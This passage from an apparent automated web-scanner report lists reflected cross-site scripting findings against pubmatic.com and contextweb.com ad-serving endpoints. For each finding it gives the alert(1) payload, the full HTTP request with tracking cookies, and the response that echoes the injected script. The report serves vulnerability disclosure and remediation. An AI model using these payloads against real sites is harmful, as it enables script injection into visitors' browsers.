document.write('<div id="http_www_politico_comkomli_ads_frame1271802718112df5'-alert(1)-'78a7bb69b97" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAAAAAAAAAAAAAAAAAAAAAABqeAAApQAAANgCAABaAAAABwAAAAAAAAAAAAAAAQAAADlFMjkzQjV
...[SNIP]...

3.61. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93091'-alert(1)-'e25b469b5fe was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/93091'-alert(1)-'e25b469b5fe&frameName=http_www_politico_comkomli_ads_frame12718027181&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1795
Date: Tue, 01 Nov 2011 01:29:26 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:25 GMT; path=/
Set-Cookie: pubfreq_27181_22456_76087372=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:26 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:26 GMT; path=/

document.write('<div id="http_www_politico_comkomli_ads_frame12718027181" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAA
...[SNIP]...
mtpfact=0.000000&kadNetFrequecy=3&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1320110966&indirectAdId=30826&adServerOptimizerId=1&ranreq=0.7080080761587771&imprCap=1&pageURL=http://www.politico.com/93091'-alert(1)-'e25b469b5fe">
...[SNIP]...

3.62. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8323'-alert(1)-'c4592e9428f was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/&frameName=http_www_politico_comkomli_ads_frame12718027181&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771f8323'-alert(1)-'c4592e9428f&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1791
Date: Tue, 01 Nov 2011 01:29:31 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:30 GMT; path=/
Set-Cookie: pubfreq_27181_22456_38660990=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:31 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:31 GMT; path=/

document.write('<div id="http_www_politico_comkomli_ads_frame12718027181" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAA
...[SNIP]...
Id=22456&adServerId=165&kefact=0.800000&kpbmtpfact=0.000000&kadNetFrequecy=3&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1320110971&indirectAdId=30826&adServerOptimizerId=1&ranreq=0.7080080761587771f8323'-alert(1)-'c4592e9428f&imprCap=1&pageURL=http://www.politico.com/">
...[SNIP]...

3.63. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7266"%3balert(1)//5bb8f1d904 was submitted in the action parameter. This input was echoed as b7266";alert(1)//5bb8f1d904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADb7266"%3balert(1)//5bb8f1d904&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Tue, 25 Oct 02011 16:23:13 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:09 GMT
Content-Length: 8863
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:49 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWADb7266";alert(1)//5bb8f1d904";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           retur
...[SNIP]...

3.64. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee865"%3balert(1)//09abc2650ba was submitted in the cwadformat parameter. This input was echoed as ee865";alert(1)//09abc2650ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90ee865"%3balert(1)//09abc2650ba&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Last-Modified: Tue, 25 Oct 02011 16:16:07 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:11 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:51 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90ee865";alert(1)//09abc2650ba";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90ee865";alert(1)//09abc2650ba";var cn="1";var epid="1822";var esid="16543";

       String.p
...[SNIP]...

3.65. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 924a2"%3balert(1)//97f0af79fc5 was submitted in the cwheight parameter. This input was echoed as 924a2";alert(1)//97f0af79fc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90924a2"%3balert(1)//97f0af79fc5&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP213
Last-Modified: Tue, 25 Oct 02011 16:48:03 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:14 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:54 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90924a2";alert(1)//97f0af79fc5";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLower
...[SNIP]...

3.66. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63007"%3balert(1)//20143b9261c was submitted in the cwpid parameter. This input was echoed as 63007";alert(1)//20143b9261c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=53645463007"%3balert(1)//20143b9261c&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Last-Modified: Tue, 25 Oct 02011 16:20:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:12 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:52 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="53645463007";alert(1)//20143b9261c";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="53645463007";alert(1)//20143b9261c";var ct="101928";var cf="728X90";var cn="1";
...[SNIP]...

3.67. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ee2"%3balert(1)//21adaaad5aa was submitted in the cwpnet parameter. This input was echoed as 67ee2";alert(1)//21adaaad5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=167ee2"%3balert(1)//21adaaad5aa&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Last-Modified: Tue, 25 Oct 02011 16:35:49 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:14 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:54 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="167ee2";alert(1)//21adaaad5aa";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var
...[SNIP]...

3.68. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e31"%3balert(1)//0f0bf0ed21 was submitted in the cwrun parameter. This input was echoed as d0e31";alert(1)//0f0bf0ed21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200d0e31"%3balert(1)//0f0bf0ed21&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP206
Last-Modified: Tue, 25 Oct 02011 16:25:32 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:10 GMT
Content-Length: 8863
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:50 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200d0e31";alert(1)//0f0bf0ed21";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowe
...[SNIP]...

3.69. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

